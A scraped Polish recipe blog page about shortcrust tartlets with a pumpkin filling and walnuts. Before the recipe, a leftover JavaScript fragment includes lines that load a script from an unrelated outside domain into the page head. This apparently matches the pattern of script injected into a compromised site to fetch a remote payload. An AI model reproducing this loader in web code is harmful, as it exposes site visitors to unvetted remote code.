, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Kruche babeczki z dyniowym środkiem i orzechami

Wydrukuj artykuł Wydrukuj artykuł

Kruche babeczki z dyniowym środkiem i orzechami

Nadzienie z mocno dyniowych naleśników bardzo nam zasmakowało, dlatego pomyślałam o jego nowym zastosowaniu. W zamrażarce miałam kilka wcześniej upieczonych kruchych babeczek. Rozmroziłam, napełniłam kremem i ozdobiłam serkiem i prażonymi na patelni orzechami włoskimi – wyszła bardzo dobra, słodka przekąska:)  Jak przygotować kruche babeczki napisałam przy przepisie na Poziomkowe Babeczki Babci Wisi. Do dyniowych babeczek polecam zastosować mieszankę pół na pół z mąki razowej i zwykłej.

Jeżeli nie mamy czasu na pieczenie babeczek, można oczywiście kupić gotowe puste babeczki.

Kategoria: Bez kategorii Komentarz »


Skomentuj...



Początek strony